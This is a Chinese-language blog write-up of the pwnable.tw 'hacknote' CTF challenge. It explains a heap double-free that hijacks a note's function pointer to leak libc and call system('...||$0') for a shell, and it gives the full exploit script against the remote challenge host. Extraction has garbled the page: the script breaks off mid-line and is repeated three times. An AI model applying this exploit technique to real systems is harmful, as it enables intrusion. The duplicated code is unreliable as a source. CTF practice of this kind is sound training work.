pwnable.tw-hacknote

Table Of Contents

大体思路

又是一道基本的堆题,一开始想double free一直在想在那里可以构造一个fake chunk。然后感觉也不好leak

后来发现每个note的ptr[0]是一个函数,可以通过double free来控制ptr[0],改成puts就能leak出libc_base。之后改成system。

但是它的调用是ptr[0](ptr[0]),于是搜索了一番以后发现可以system(“asdfsadf||/bin/sh”)。但是每个头都只有8个bytes,放”||/bin/sh”又放不下,于是用到了之前做bugku的时候发现的冷知识:$0。

最后改成system(“system_addr||$0”)就可以getshell。

对堆的利用我就放一张之前打得草稿好了。但是画得很乱,可以试着看一看

第一个note分配大一些,在后面连续分配两次note的时候能控制chunk 1

exp

from PwnContext import *
from libnum import *

try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')

def add(size, content):
    sla(':', '1')
    sla(':',str(size))
    sla(':',content)

def free(index):
    sla(':','2')
    sla(':',str(index))

def dump(index):
    sla(':','3')
    sla(':',str(index))

if __name__ == '__main__':        
    # context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
    context.log_level = 'debug'
    # functions for quick script
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
    sl      = lambda data               :ctx.sendline(str(data)) 
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    uu32    = lambda data   :u32(data.ljust(4, '
from PwnContext import *
from libnum import *
try:
from IPython import embed as ipy
except ImportError:
print ('IPython not installed.')
def add(size, content):
sla(':', '1')
sla(':',str(size))
sla(':',content)
def free(index):
sla(':','2')
sla(':',str(index))
def dump(index):
sla(':','3')
sla(':',str(index))
if __name__ == '__main__':        
# context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
context.log_level = 'debug'
# functions for quick script
s       = lambda data               :ctx.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
# misc functions
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))
ctx.binary = './hacknote'
ctx.remote = ('chall.pwnable.tw', 10102)
ctx.remote_libc = './libc.so.6'
ctx.debug_remote_libc = True
# rs()
rs('remote')
print(ctx.libc.path)
add(0x10,'a'*0x10)  # 0
add(0x8,'b'*0x8)  # 1
free(1)
free(0)
free(1)
add(0x8,'d'*8)  # 0
add(0x8,p32(0x804862B)+p32(ctx.binary.got['puts']))  # 1
dump(1)
ru('Index :')
puts = u32(ru(' ')[:4])
libc_base = puts - ctx.libc.symbols['puts']
print('libc_base: '+hex(libc_base))
system = libc_base + ctx.libc.symbols['system']
free(0)
add(0x8,p32(system)+'||$0')
dump(1)
# dbg()
irt()
')) uu64 = lambda data :u64(data.ljust(8, '
from PwnContext import *
from libnum import *
try:
from IPython import embed as ipy
except ImportError:
print ('IPython not installed.')
def add(size, content):
sla(':', '1')
sla(':',str(size))
sla(':',content)
def free(index):
sla(':','2')
sla(':',str(index))
def dump(index):
sla(':','3')
sla(':',str(index))
if __name__ == '__main__':        
# context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
context.log_level = 'debug'
# functions for quick script
s       = lambda data               :ctx.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
# misc functions
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))
ctx.binary = './hacknote'
ctx.remote = ('chall.pwnable.tw', 10102)
ctx.remote_libc = './libc.so.6'
ctx.debug_remote_libc = True
# rs()
rs('remote')
print(ctx.libc.path)
add(0x10,'a'*0x10)  # 0
add(0x8,'b'*0x8)  # 1
free(1)
free(0)
free(1)
add(0x8,'d'*8)  # 0
add(0x8,p32(0x804862B)+p32(ctx.binary.got['puts']))  # 1
dump(1)
ru('Index :')
puts = u32(ru(' ')[:4])
libc_base = puts - ctx.libc.symbols['puts']
print('libc_base: '+hex(libc_base))
system = libc_base + ctx.libc.symbols['system']
free(0)
add(0x8,p32(system)+'||$0')
dump(1)
# dbg()
irt()
')) ctx.binary = './hacknote' ctx.remote = ('chall.pwnable.tw', 10102) ctx.remote_libc = './libc.so.6' ctx.debug_remote_libc = True # rs() rs('remote') print(ctx.libc.path) add(0x10,'a'*0x10) # 0 add(0x8,'b'*0x8) # 1 free(1) free(0) free(1) add(0x8,'d'*8) # 0 add(0x8,p32(0x804862B)+p32(ctx.binary.got['puts'])) # 1 dump(1) ru('Index :') puts = u32(ru(' ')[:4]) libc_base = puts - ctx.libc.symbols['puts'] print('libc_base: '+hex(libc_base)) system = libc_base + ctx.libc.symbols['system'] free(0) add(0x8,p32(system)+'||$0') dump(1) # dbg() irt()

附:

最近在搜怎么替换指定libc的时候发现了一个很牛逼的framework——welpwn,用了一下以后感觉非常易用

说点什么

avatar

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

  Subscribe  
提醒